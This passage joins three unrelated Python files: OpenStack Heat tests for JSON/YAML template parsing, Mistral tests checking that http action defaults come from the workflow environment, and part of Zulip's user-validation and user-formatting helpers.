            template_test_count += 1
            if template_test_count >= self.expected_test_count:
                break

        self.assertTrue(template_test_count >= self.expected_test_count,
                        'Expected at least %d templates to be tested, not %d' %
                        (self.expected_test_count, template_test_count))

    def compare_json_vs_yaml(self, json_str, yml_str, file_name):
        """Assert the parsed YAML matches the parsed JSON after
        normalizing away the format-version keys."""
        yml = template_format.parse(yml_str)

        self.assertEqual(u'2012-12-12', yml[u'HeatTemplateFormatVersion'],
                         file_name)
        self.assertFalse(u'AWSTemplateFormatVersion' in yml, file_name)
        del yml[u'HeatTemplateFormatVersion']

        jsn = template_format.parse(json_str)

        if u'AWSTemplateFormatVersion' in jsn:
            del jsn[u'AWSTemplateFormatVersion']

        self.assertEqual(yml, jsn, file_name)

    def convert_all_json_to_yaml(self, dirpath):
        """Yield (json_str, yml_str, file_name) for each template file.

        Files are opened with a context manager so each handle is closed
        promptly; the original left every file open until GC.
        """
        for path in os.listdir(dirpath):
            if not path.endswith('.template') and not path.endswith('.json'):
                continue
            file_path = os.path.join(dirpath, path)
            with open(file_path, 'r') as f:
                json_str = f.read()

            yml_str = template_format.convert_json_to_yaml(json_str)
            # file_path equals what f.name reported previously.
            yield (json_str, yml_str, file_path)


class YamlMinimalTest(HeatTestCase):
    """Template parsing edge cases: size limits, versions, bad syntax."""

    def _parse_template(self, tmpl_str, msg_str):
        """Assert parsing tmpl_str raises ValueError containing msg_str."""
        parse_ex = self.assertRaises(ValueError,
                                     template_format.parse,
                                     tmpl_str)
        self.assertIn(msg_str, six.text_type(parse_ex))

    def test_long_yaml(self):
        template = {'HeatTemplateFormatVersion': '2012-12-12'}
        config.cfg.CONF.set_override('max_template_size', 1024)
        # Floor division is required: on Python 3 a plain '/' yields a
        # float, and list repetition by a float raises TypeError.
        template['Resources'] = ['a'] * (
            config.cfg.CONF.max_template_size // 3)
        limit = config.cfg.CONF.max_template_size
        long_yaml = yaml.safe_dump(template)
        self.assertTrue(len(long_yaml) > limit)
        ex = self.assertRaises(exception.RequestLimitExceeded,
                               template_format.parse, long_yaml)
        msg = ('Request limit exceeded: Template exceeds maximum allowed size '
               '(1024 bytes)')
        self.assertEqual(msg, six.text_type(ex))

    def test_parse_no_version_format(self):
        # Local renamed from 'yaml' to stop shadowing the imported module.
        empty_yaml = ''
        self._parse_template(empty_yaml, 'Template format version not found')
        yaml2 = '''Parameters: {}
Mappings: {}
Resources: {}
Outputs: {}
'''
        self._parse_template(yaml2, 'Template format version not found')

    def test_parse_string_template(self):
        tmpl_str = 'just string'
        msg = 'The template is not a JSON object or YAML mapping.'
        self._parse_template(tmpl_str, msg)

    def test_parse_invalid_yaml_and_json_template(self):
        tmpl_str = '{test'
        msg = 'line 1, column 1'
        self._parse_template(tmpl_str, msg)

    def test_parse_json_document(self):
        tmpl_str = '["foo" , "bar"]'
        msg = 'The template is not a JSON object or YAML mapping.'
        self._parse_template(tmpl_str, msg)

    def test_parse_empty_json_template(self):
        tmpl_str = '{}'
        msg = 'Template format version not found'
        self._parse_template(tmpl_str, msg)

    def test_parse_yaml_template(self):
        tmpl_str = 'heat_template_version: 2013-05-23'
        expected = {'heat_template_version': '2013-05-23'}
        self.assertEqual(expected, template_format.parse(tmpl_str))


class YamlParseExceptions(HeatTestCase):
    """Low-level YAML library errors must surface as ValueError."""

    # Each scenario injects a different yaml exception type into the
    # loader to verify template_format.parse normalizes all of them.
    scenarios = [
        ('scanner', dict(raised_exception=yaml.scanner.ScannerError())),
        ('parser', dict(raised_exception=yaml.parser.ParserError())),
        ('reader',
         dict(raised_exception=yaml.reader.ReaderError('', '', '', '', ''))),
    ]

    def test_parse_to_value_exception(self):
        """Injected YAML error is translated into ValueError by parse()."""
        text = 'not important'

        with mock.patch.object(yaml, 'load') as yaml_loader:
            yaml_loader.side_effect = self.raised_exception
            self.assertRaises(ValueError,
                              template_format.parse, text)


class JsonYamlResolvedCompareTest(HeatTestCase):
    """Compare fully-parsed stacks built from JSON vs YAML templates."""

    def setUp(self):
        super(JsonYamlResolvedCompareTest, self).setUp()
        self.longMessage = True
        self.maxDiff = None

    def load_template(self, file_name):
        """Parse a template from the bundled 'templates' directory.

        Uses a context manager so the file is closed even when
        template_format.parse raises; the original open/close pair
        leaked the handle on a parse error.
        """
        filepath = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                'templates', file_name)
        with open(filepath) as f:
            return template_format.parse(f.read())

    def compare_stacks(self, json_file, yaml_file, parameters):
        """Assert both template formats produce equivalent stacks."""
        t1 = self.load_template(json_file)
        t2 = self.load_template(yaml_file)
        # Normalize the version keys so the two dicts compare directly.
        del t1[u'AWSTemplateFormatVersion']
        t1[u'HeatTemplateFormatVersion'] = t2[u'HeatTemplateFormatVersion']
        stack1 = utils.parse_stack(t1, parameters)
        stack2 = utils.parse_stack(t2, parameters)

        # compare resources separately so that resolved static data
        # is compared
        t1nr = dict(stack1.t.t)
        del t1nr['Resources']

        t2nr = dict(stack2.t.t)
        del t2nr['Resources']
        self.assertEqual(t1nr, t2nr)

        self.assertEqual(set(stack1.keys()), set(stack2.keys()))
        for key in stack1:
            self.assertEqual(stack1[key].t, stack2[key].t)

    def test_neutron_resolved(self):
        self.compare_stacks('Neutron.template', 'Neutron.yaml', {})

    def test_wordpress_resolved(self):
        self.compare_stacks('WordPress_Single_Instance.template',
                            'WordPress_Single_Instance.yaml',
                            {'KeyName': 'test'})

# Copyright 2015 - StackStorm, Inc.
#
#    Licensed under the Apache License, Version 2.0 (the "License");
#    you may not use this file except in compliance with the License.
#    You may obtain a copy of the License at
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS,
#    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#    See the License for the specific language governing permissions and
#    limitations under the License.

import mock
from oslo_config import cfg
import requests

from mistral.actions import std_actions
from mistral.db.v2 import api as db_api
from mistral.services import workflows as wf_service
from mistral.tests.unit import base as test_base
from mistral.tests.unit.engine import base
from mistral.workflow import states


# Use the set_default method to set value otherwise in certain test cases
# the change in value is not permanent.
cfg.CONF.set_default('auth_enable', False, group='pecan')

# Workflow environment providing defaults for every std.http action:
# basic-auth credentials and a 30-second timeout.  Tasks that specify
# their own timeout override the env value (see WORKFLOW2).
ENV = {
    '__actions': {
        'std.http': {
            'auth': 'librarian:password123',
            'timeout': 30,
        }
    }
}

# The (user, password) tuple form that the requests library receives
# after the 'user:password' env string is split.
EXPECTED_ENV_AUTH = ('librarian', 'password123')

# Single-task workflow with no explicit timeout; env defaults apply.
WORKFLOW1 = """
---
version: "2.0"
wf1:
  type: direct
  tasks:
    task1:
      action: std.http url="https://api.library.org/books"
      publish:
        result: <% $ %>
"""

# Same as WORKFLOW1 but with an explicit timeout=60 that must take
# precedence over the env default.
WORKFLOW2 = """
---
version: "2.0"
wf2:
  type: direct
  tasks:
    task1:
      action: std.http url="https://api.library.org/books" timeout=60
      publish:
        result: <% $ %>
"""

# with-items variant of WORKFLOW1: one std.http call per input link,
# all inheriting the env defaults.
WORKFLOW1_WITH_ITEMS = """
---
version: "2.0"
wf1_with_items:
  type: direct
  input:
    - links
  tasks:
    task1:
      with-items: link in <% $.links %>
      action: std.http url=<% $.link %>
      publish:
        result: <% $ %>
"""

# with-items variant of WORKFLOW2: explicit timeout=60 per call.
WORKFLOW2_WITH_ITEMS = """
---
version: "2.0"
wf2_with_items:
  type: direct
  input:
    - links
  tasks:
    task1:
      with-items: link in <% $.links %>
      action: std.http url=<% $.link %> timeout=60
      publish:
        result: <% $ %>
"""


class ActionDefaultTest(base.EngineTestCase):
    """Verify action defaults from the workflow env are (or are not)
    applied to std.http invocations.

    Every test stubs requests.request and forces HTTPAction to run
    synchronously, then inspects the exact arguments requests received.
    """

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_action_defaults_from_env(self):
        """Env-provided auth and timeout reach the HTTP call unchanged."""
        wf_service.create_workflows(WORKFLOW1)

        wf_ex = self.engine.start_workflow('wf1', env=ENV)

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

        # Both auth and timeout come from ENV since the task set neither.
        requests.request.assert_called_with(
            'GET', 'https://api.library.org/books',
            params=None, data=None, headers=None, cookies=None,
            allow_redirects=None, proxies=None, verify=None,
            auth=EXPECTED_ENV_AUTH,
            timeout=ENV['__actions']['std.http']['timeout'])

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_action_defaults_from_env_not_applied(self):
        """A task-level timeout overrides the env default (auth still
        comes from the env)."""
        wf_service.create_workflows(WORKFLOW2)

        wf_ex = self.engine.start_workflow('wf2', env=ENV)

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

        # timeout=60 is the task's own value, not the env's 30.
        requests.request.assert_called_with(
            'GET', 'https://api.library.org/books',
            params=None, data=None, headers=None, cookies=None,
            allow_redirects=None, proxies=None, verify=None,
            auth=EXPECTED_ENV_AUTH,
            timeout=60
        )

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_with_items_action_defaults_from_env(self):
        """Env defaults apply to every iteration of a with-items task."""
        wf_service.create_workflows(WORKFLOW1_WITH_ITEMS)

        wf_input = {
            'links': [
                'https://api.library.org/books',
                'https://api.library.org/authors'
            ]
        }

        wf_ex = self.engine.start_workflow(
            'wf1_with_items',
            wf_input=wf_input,
            env=ENV
        )

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

            # One expected HTTP call per input link, each carrying the
            # env-provided auth and timeout.
            calls = [mock.call('GET', url, params=None, data=None,
                               headers=None, cookies=None,
                               allow_redirects=None, proxies=None,
                               auth=EXPECTED_ENV_AUTH, verify=None,
                               timeout=ENV['__actions']['std.http']['timeout'])
                     for url in wf_input['links']]

        requests.request.assert_has_calls(calls, any_order=True)

    @mock.patch.object(
        requests, 'request',
        mock.MagicMock(return_value=test_base.FakeHTTPResponse('', 200, 'OK')))
    @mock.patch.object(
        std_actions.HTTPAction, 'is_sync',
        mock.MagicMock(return_value=True))
    def test_with_items_action_defaults_from_env_not_applied(self):
        """Task-level timeout overrides the env default in every
        with-items iteration."""
        wf_service.create_workflows(WORKFLOW2_WITH_ITEMS)

        wf_input = {
            'links': [
                'https://api.library.org/books',
                'https://api.library.org/authors'
            ]
        }

        wf_ex = self.engine.start_workflow(
            'wf2_with_items',
            wf_input=wf_input,
            env=ENV
        )

        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self._assert_single_item(wf_ex.task_executions, name='task1')

        # timeout=60 from the task definition, auth from the env.
        calls = [mock.call('GET', url, params=None, data=None,
                           headers=None, cookies=None,
                           allow_redirects=None, proxies=None,
                           auth=EXPECTED_ENV_AUTH, verify=None,
                           timeout=60)
                 for url in wf_input['links']]

        requests.request.assert_has_calls(calls, any_order=True)

import re
import unicodedata
from collections import defaultdict
from typing import Any, Dict, List, Optional, Sequence, Union

from django.conf import settings
from django.core.exceptions import ValidationError
from django.db.models.query import QuerySet
from django.forms.models import model_to_dict
from django.utils.translation import gettext as _
from typing_extensions import TypedDict
from zulip_bots.custom_exceptions import ConfigValidationError

from zerver.lib.avatar import avatar_url, get_avatar_field
from zerver.lib.cache import (
    bulk_cached_fetch,
    realm_user_dict_fields,
    user_profile_by_id_cache_key,
    user_profile_cache_key_id,
)
from zerver.lib.exceptions import OrganizationAdministratorRequired
from zerver.lib.request import JsonableError
from zerver.lib.timezone import canonicalize_timezone
from zerver.models import (
    CustomProfileField,
    CustomProfileFieldValue,
    Realm,
    Service,
    UserProfile,
    get_realm_user_dicts,
    get_user_profile_by_id_in_realm,
)


def check_full_name(full_name_raw: str) -> str:
    """Validate and normalize a user-visible full name.

    Strips surrounding whitespace, enforces the realm-wide length
    bounds, and rejects control characters and other disallowed
    characters; raises JsonableError on any violation and returns the
    cleaned name otherwise.
    """
    full_name = full_name_raw.strip()
    if len(full_name) > UserProfile.MAX_NAME_LENGTH:
        raise JsonableError(_("Name too long!"))
    if len(full_name) < UserProfile.MIN_NAME_LENGTH:
        raise JsonableError(_("Name too short!"))
    if any(
        unicodedata.category(char)[0] == "C" or char in UserProfile.NAME_INVALID_CHARS
        for char in full_name
    ):
        raise JsonableError(_("Invalid characters in name!"))
    # A name ending in e.g. `|15` could confuse sloppily-written
    # parsers of our Markdown mention syntax, and such names have no
    # real use, so we ban them.
    if re.search(r"\|\d+$", full_name_raw):
        raise JsonableError(_("Invalid format!"))
    return full_name


# NOTE: We don't try to absolutely prevent 2 bots from having the same
# name (e.g. you can get there by reactivating a deactivated bot after
# making a new bot with the same name).  This is just a check designed
# to make it unlikely to happen by accident.
def check_bot_name_available(realm_id: int, full_name: str) -> None:
    """Raise JsonableError if an active user in the realm already has this name."""
    name_in_use = UserProfile.objects.filter(
        realm_id=realm_id,
        full_name=full_name.strip(),
        is_active=True,
    ).exists()

    if name_in_use:
        raise JsonableError(_("Name is already in use!"))


def check_short_name(short_name_raw: str) -> str:
    """Strip whitespace from a short name, rejecting names that become empty."""
    short_name = short_name_raw.strip()
    if not short_name:
        raise JsonableError(_("Bad name or username"))
    return short_name


def check_valid_bot_config(bot_type: int, service_name: str, config_data: Dict[str, str]) -> None:
    """Validate service configuration data for a bot of the given type.

    For incoming webhook bots, config_data is checked against the
    matching webhook integration's declared config options; for
    embedded bots, validation is delegated to the bot handler's
    validate_config hook (if it defines one).  Raises JsonableError on
    any problem; other bot types are accepted without checks.
    """
    if bot_type == UserProfile.INCOMING_WEBHOOK_BOT:
        from zerver.lib.integrations import WEBHOOK_INTEGRATIONS

        config_options = None
        # Find the integration whose name matches the requested service.
        for integration in WEBHOOK_INTEGRATIONS:
            if integration.name == service_name:
                # key: validator
                config_options = {c[1]: c[2] for c in integration.config_options}
                break
        if not config_options:
            raise JsonableError(_("Invalid integration '{}'.").format(service_name))

        # Every declared option must be present in the submitted config.
        missing_keys = set(config_options.keys()) - set(config_data.keys())
        if missing_keys:
            raise JsonableError(
                _("Missing configuration parameters: {}").format(
                    missing_keys,
                )
            )

        # Run each option's validator; a truthy return value is an error string.
        for key, validator in config_options.items():
            value = config_data[key]
            error = validator(key, value)
            if error:
                raise JsonableError(_("Invalid {} value {} ({})").format(key, value, error))

    elif bot_type == UserProfile.EMBEDDED_BOT:
        try:
            from zerver.lib.bot_lib import get_bot_handler

            bot_handler = get_bot_handler(service_name)
            if hasattr(bot_handler, "validate_config"):
                bot_handler.validate_config(config_data)
        except ConfigValidationError:
            # The exception provides a specific error message, but that
            # message is not tagged translatable, because it is
            # triggered in the external zulip_bots package.
            # TODO: Think of some clever way to provide a more specific
            # error message.
            raise JsonableError(_("Invalid configuration data!"))


# Adds an outgoing webhook or embedded bot service.
def add_service(
    name: str,
    user_profile: UserProfile,
    base_url: Optional[str] = None,
    interface: Optional[int] = None,
    token: Optional[str] = None,
) -> None:
    """Create the Service row backing an outgoing webhook or embedded bot."""
    Service.objects.create(
        name=name,
        user_profile=user_profile,
        base_url=base_url,
        interface=interface,
        token=token,
    )


def check_bot_creation_policy(user_profile: UserProfile, bot_type: int) -> None:
    """Enforce the realm's bot_creation_policy for this user and bot type.

    Raises OrganizationAdministratorRequired when the policy forbids
    this (non-admin) user from creating a bot of the given type.
    """
    # Realm administrators can always add bots.
    if user_profile.is_realm_admin:
        return

    policy = user_profile.realm.bot_creation_policy
    if policy == Realm.BOT_CREATION_EVERYONE:
        return
    if policy == Realm.BOT_CREATION_ADMINS_ONLY:
        raise OrganizationAdministratorRequired()
    if policy == Realm.BOT_CREATION_LIMIT_GENERIC_BOTS and bot_type == UserProfile.DEFAULT_BOT:
        raise OrganizationAdministratorRequired()


def check_valid_bot_type(user_profile: UserProfile, bot_type: int) -> None:
    """Reject bot types this user is not permitted to create."""
    allowed_types = user_profile.allowed_bot_types
    if bot_type not in allowed_types:
        raise JsonableError(_("Invalid bot type"))


def check_valid_interface_type(interface_type: Optional[int]) -> None:
    """Reject interface types outside Service.ALLOWED_INTERFACE_TYPES."""
    valid_types = Service.ALLOWED_INTERFACE_TYPES
    if interface_type not in valid_types:
        raise JsonableError(_("Invalid interface type"))


def is_administrator_role(role: int) -> bool:
    """True for the realm-administrator and realm-owner roles."""
    return role in {
        UserProfile.ROLE_REALM_ADMINISTRATOR,
        UserProfile.ROLE_REALM_OWNER,
    }


def bulk_get_users(
    emails: List[str], realm: Optional[Realm], base_query: Optional["QuerySet[UserProfile]"] = None
) -> Dict[str, UserProfile]:
    """Fetch UserProfiles for the given emails (case-insensitively), via a cache.

    Returns a dict keyed by lowercased email.  If base_query is None,
    active users of `realm` are queried (realm must not be None in that
    case); otherwise base_query is used as-is — see the warning below.
    """
    if base_query is None:
        assert realm is not None
        query = UserProfile.objects.filter(realm=realm, is_active=True)
        realm_id = realm.id
    else:
        # WARNING: Currently, this code path only really supports one
        # version of `base_query` being used (because otherwise,
        # they'll share the cache, which can screw up the filtering).
        # If you're using this flow, you'll need to re-do any filters
        # in base_query in the code itself; base_query is just a perf
        # optimization.
        query = base_query
        realm_id = 0  # sentinel realm ID used only in the cache key

    def fetch_users_by_email(emails: List[str]) -> List[UserProfile]:
        # This should be just
        #
        # UserProfile.objects.select_related("realm").filter(email__iexact__in=emails,
        #                                                    realm=realm)
        #
        # But chaining __in and __iexact doesn't work with Django's
        # ORM, so we have the following hack to construct the relevant where clause
        where_clause = "upper(zerver_userprofile.email::text) IN (SELECT upper(email) FROM unnest(%s) AS email)"
        return query.select_related("realm").extra(where=[where_clause], params=(emails,))

    def user_to_email(user_profile: UserProfile) -> str:
        return user_profile.email.lower()

    return bulk_cached_fetch(
        # Use a separate cache key to protect us from conflicts with
        # the get_user cache.
        lambda email: "bulk_get_users:" + user_profile_cache_key_id(email, realm_id),
        fetch_users_by_email,
        [email.lower() for email in emails],
        id_fetcher=user_to_email,
    )


def get_user_id(user: UserProfile) -> int:
    """Return the user's database ID (used as an id_fetcher for caching)."""
    return user.id


def user_ids_to_users(user_ids: Sequence[int], realm: Realm) -> List[UserProfile]:
    """Fetch a UserProfile for each ID, validating realm membership.

    Raises JsonableError naming the first offending ID when any ID is
    unknown or belongs to a different realm.
    """
    # TODO: Consider adding a flag to control whether deactivated
    # users should be included.

    def fetch_users_by_id(user_ids: List[int]) -> List[UserProfile]:
        return list(UserProfile.objects.filter(id__in=user_ids).select_related())

    # Cache-backed bulk fetch keyed by user ID.
    user_profiles_by_id: Dict[int, UserProfile] = bulk_cached_fetch(
        cache_key_function=user_profile_by_id_cache_key,
        query_function=fetch_users_by_id,
        object_ids=user_ids,
        id_fetcher=get_user_id,
    )

    # Any requested ID that didn't come back is invalid; report the first.
    found_user_ids = user_profiles_by_id.keys()
    missed_user_ids = [user_id for user_id in user_ids if user_id not in found_user_ids]
    if missed_user_ids:
        raise JsonableError(_("Invalid user ID: {}").format(missed_user_ids[0]))

    # IDs resolving to users outside `realm` are treated as invalid too.
    user_profiles = list(user_profiles_by_id.values())
    for user_profile in user_profiles:
        if user_profile.realm != realm:
            raise JsonableError(_("Invalid user ID: {}").format(user_profile.id))
    return user_profiles


def access_bot_by_id(user_profile: UserProfile, user_id: int) -> UserProfile:
    """Fetch a bot in user_profile's realm that user_profile may administer.

    Raises JsonableError when the ID doesn't resolve to a bot in the
    realm, or when the acting user lacks admin rights over it.
    """
    try:
        bot = get_user_profile_by_id_in_realm(user_id, user_profile.realm)
    except UserProfile.DoesNotExist:
        raise JsonableError(_("No such bot"))

    if not bot.is_bot:
        raise JsonableError(_("No such bot"))
    if not user_profile.can_admin_user(bot):
        raise JsonableError(_("Insufficient permission"))
    return bot


def access_user_by_id(
    user_profile: UserProfile,
    target_user_id: int,
    *,
    allow_deactivated: bool = False,
    allow_bots: bool = False,
    for_admin: bool,
) -> UserProfile:
    """Master function for accessing another user by ID in API code;
    verifies the user ID is in the same realm, and if requested checks
    for administrative privileges, with flags for various special
    cases.
    """
    try:
        target = get_user_profile_by_id_in_realm(target_user_id, user_profile.realm)
    except UserProfile.DoesNotExist:
        raise JsonableError(_("No such user"))

    # Guard clauses for the various access flags.
    if not allow_bots and target.is_bot:
        raise JsonableError(_("No such user"))
    if not allow_deactivated and not target.is_active:
        raise JsonableError(_("User is deactivated"))
    # Administrative access is not required just to read a user.
    if for_admin and not user_profile.can_admin_user(target):
        raise JsonableError(_("Insufficient permission"))
    return target


class Accounts(TypedDict):
    """Summary of one active (non-bot) account associated with an email
    address, as returned by get_accounts_for_email."""

    realm_name: str
    realm_id: int
    full_name: str
    avatar: Optional[str]  # avatar URL; may be None


def get_accounts_for_email(email: str) -> List[Accounts]:
    """List the active, non-bot accounts (across all active realms) for
    an email address, ordered by account creation time."""
    profiles = (
        UserProfile.objects.select_related("realm")
        .filter(
            delivery_email__iexact=email.strip(),
            is_active=True,
            realm__deactivated=False,
            is_bot=False,
        )
        .order_by("date_joined")
    )
    return [
        dict(
            realm_name=profile.realm.name,
            realm_id=profile.realm.id,
            full_name=profile.full_name,
            avatar=avatar_url(profile),
        )
        for profile in profiles
    ]


def get_api_key(user_profile: UserProfile) -> str:
    """Return the user's (single) API key."""
    return user_profile.api_key


def get_all_api_keys(user_profile: UserProfile) -> List[str]:
    """Return all API keys for the user; currently always exactly one."""
    return [user_profile.api_key]


def validate_user_custom_profile_field(
    realm_id: int, field: CustomProfileField, value: Union[int, str, List[int]]
) -> Union[int, str, List[int]]:
    """Validate a single custom profile field value.

    Dispatches on field.field_type to the matching validator and
    returns the validator's (possibly normalized) result; raises
    AssertionError for an unknown field type.
    """
    field_type = field.field_type
    var_name = f"{field.name}"

    simple_validators = CustomProfileField.FIELD_VALIDATORS
    if field_type in simple_validators:
        return simple_validators[field_type](var_name, value)

    if field_type == CustomProfileField.SELECT:
        select_validator = CustomProfileField.SELECT_FIELD_VALIDATORS[field_type]
        field_data = field.field_data
        # Assertion so that mypy knows field_data is not None here.
        assert field_data is not None
        return select_validator(var_name, field_data, value)

    if field_type == CustomProfileField.USER:
        user_validator = CustomProfileField.USER_FIELD_VALIDATORS[field_type]
        return user_validator(realm_id, value, False)

    raise AssertionError("Invalid field type")


def validate_user_custom_profile_data(
    realm_id: int, profile_data: List[Dict[str, Union[int, str, List[int]]]]
) -> None:
    """Validate each submitted custom-field value against its field's type.

    Raises JsonableError for unknown field IDs or values the field's
    validator rejects.
    """
    for entry in profile_data:
        field_id = entry["id"]
        try:
            field = CustomProfileField.objects.get(id=field_id)
        except CustomProfileField.DoesNotExist:
            raise JsonableError(_("Field id {id} not found.").format(id=field_id))

        try:
            validate_user_custom_profile_field(realm_id, field, entry["value"])
        except ValidationError as error:
            # Surface the validator's message as an API-level error.
            raise JsonableError(error.message)


def can_access_delivery_email(user_profile: UserProfile) -> bool:
    """Whether this user may see other users' delivery (real) email
    addresses, per the realm's email_address_visibility policy."""
    visibility = user_profile.realm.email_address_visibility
    if visibility == Realm.EMAIL_ADDRESS_VISIBILITY_ADMINS:
        return user_profile.is_realm_admin
    if visibility == Realm.EMAIL_ADDRESS_VISIBILITY_MODERATORS:
        return user_profile.is_realm_admin or user_profile.is_moderator
    return False


def format_user_row(
    realm: Realm,
    acting_user: Optional[UserProfile],
    row: Dict[str, Any],
    client_gravatar: bool,
    user_avatar_url_field_optional: bool,
    custom_profile_field_data: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
    """Formats a user row returned by a database fetch using
    .values(*realm_user_dict_fields) into a dictionary representation
    of that user for API delivery to clients.  The acting_user
    argument is used for permissions checks.
    """

    # Derive the role booleans the API exposes alongside the raw role.
    is_admin = is_administrator_role(row["role"])
    is_owner = row["role"] == UserProfile.ROLE_REALM_OWNER
    is_guest = row["role"] == UserProfile.ROLE_GUEST
    is_bot = row["is_bot"]
    result = dict(
        email=row["email"],
        user_id=row["id"],
        avatar_version=row["avatar_version"],
        is_admin=is_admin,
        is_owner=is_owner,
        is_guest=is_guest,
        is_billing_admin=row["is_billing_admin"],
        role=row["role"],
        is_bot=is_bot,
        full_name=row["full_name"],
        timezone=canonicalize_timezone(row["timezone"]),
        is_active=row["is_active"],
        date_joined=row["date_joined"].isoformat(),
    )

    # Zulip clients that support using `GET /avatar/{user_id}` as a
    # fallback if we didn't send an avatar URL in the user object pass
    # user_avatar_url_field_optional in client_capabilities.
    #
    # This is a major network performance optimization for
    # organizations with 10,000s of users where we would otherwise
    # send avatar URLs in the payload (either because most users have
    # uploaded avatars or because EMAIL_ADDRESS_VISIBILITY_ADMINS
    # prevents the older client_gravatar optimization from helping).
    # The performance impact is large largely because the hashes in
    # avatar URLs structurally cannot compress well.
    #
    # The user_avatar_url_field_optional gives the server sole
    # discretion in deciding for which users we want to send the
    # avatar URL (Which saves clients an RTT at the cost of some
    # bandwidth).  At present, the server looks at `long_term_idle` to
    # decide which users to include avatars for, piggy-backing on a
    # different optimization for organizations with 10,000s of users.
    include_avatar_url = not user_avatar_url_field_optional or not row["long_term_idle"]
    if include_avatar_url:
        result["avatar_url"] = get_avatar_field(
            user_id=row["id"],
            realm_id=realm.id,
            email=row["delivery_email"],
            avatar_source=row["avatar_source"],
            avatar_version=row["avatar_version"],
            medium=False,
            client_gravatar=client_gravatar,
        )

    # Only include the real email address when the acting user is
    # permitted to see it.
    if acting_user is not None and can_access_delivery_email(acting_user):
        result["delivery_email"] = row["delivery_email"]

    if is_bot:
        result["bot_type"] = row["bot_type"]
        if row["email"] in settings.CROSS_REALM_BOT_EMAILS:
            result["is_cross_realm_bot"] = True

        # Note that bot_owner_id can be None with legacy data.
        result["bot_owner_id"] = row["bot_owner_id"]
    elif custom_profile_field_data is not None:
        # profile_data only applies to human users.
        result["profile_data"] = custom_profile_field_data
    return result


def user_profile_to_user_row(user_profile: UserProfile) -> Dict[str, Any]:
    """Convert a UserProfile object into the dict shape produced by
    `.values(*realm_user_dict_fields)` queries.

    model_to_dict names foreign keys without the `_id` suffix
    (e.g. `bot_owner` rather than `bot_owner_id`), unlike `.values()`,
    so we fetch `bot_owner` explicitly and rename it afterwards.

    This could potentially be simplified in the future by changing
    realm_user_dict_fields to name the bot owner with the less
    readable `bot_owner` (instead of `bot_owner_id`).
    """
    row = model_to_dict(user_profile, fields=[*realm_user_dict_fields, "bot_owner"])
    row["bot_owner_id"] = row.pop("bot_owner")
    return row


def get_cross_realm_dicts() -> List[Dict[str, Any]]:
    """Return formatted user rows for the system (cross-realm) bots."""
    users = bulk_get_users(
        list(settings.CROSS_REALM_BOT_EMAILS),
        None,
        base_query=UserProfile.objects.filter(realm__string_id=settings.SYSTEM_BOT_REALM),
    ).values()
    result = []
    for user in users:
        # Important: We filter here, in addition to in
        # `base_query`, because of how bulk_get_users shares its
        # cache with other UserProfile caches.
        if user.realm.string_id != settings.SYSTEM_BOT_REALM:  # nocoverage
            continue
        user_row = user_profile_to_user_row(user)
        # Because we want to avoid clients being exposed to the
        # implementation detail that these bots are self-owned, we
        # just set bot_owner_id=None.
        user_row["bot_owner_id"] = None

        result.append(
            format_user_row(
                user.realm,
                acting_user=user,
                row=user_row,
                client_gravatar=False,
                user_avatar_url_field_optional=False,
                custom_profile_field_data=None,
            )
        )

    return result


def get_custom_profile_field_values(
    custom_profile_field_values: List[CustomProfileFieldValue],
) -> Dict[int, Dict[str, Any]]:
    """Group custom profile field values by user ID.

    Returns a mapping from user_profile_id to {str(field_id): payload};
    the payload includes rendered_value only for renderable fields.
    """
    profiles_by_user_id: Dict[int, Dict[str, Any]] = defaultdict(dict)
    for field_value in custom_profile_field_values:
        payload: Dict[str, Any] = {"value": field_value.value}
        if field_value.field.is_renderable():
            payload["rendered_value"] = field_value.rendered_value
        profiles_by_user_id[field_value.user_profile_id][str(field_value.field_id)] = payload
    return profiles_by_user_id


def get_raw_user_data(
    realm: Realm,
    acting_user: Optional[UserProfile],
    *,
    target_user: Optional[UserProfile] = None,
    client_gravatar: bool,
    user_avatar_url_field_optional: bool,
    include_custom_profile_fields: bool = True,
) -> Dict[int, Dict[str, str]]:
    """Fetches data about the target user(s) appropriate for sending to
    acting_user via the standard format for the Zulip API.  If
    target_user is None, we fetch all users in the realm.
    """
    profiles_by_user_id = None
    custom_profile_field_data = None
    # target_user is an optional parameter which is passed when user data of a specific user
    # is required. It is 'None' otherwise.
    if target_user is not None:
        user_dicts = [user_profile_to_user_row(target_user)]
    else:
        user_dicts = get_realm_user_dicts(realm.id)

    if include_custom_profile_fields:
        base_query = CustomProfileFieldValue.objects.select_related("field")
        # TODO: Consider optimizing this query away with caching.
        if target_user is not None:
            custom_profile_field_values = base_query.filter(user_profile=target_user)
        else:
            custom_profile_field_values = base_query.filter(field__realm_id=realm.id)
        profiles_by_user_id = get_custom_profile_field_values(custom_profile_field_values)

    result = {}
    for row in user_dicts:
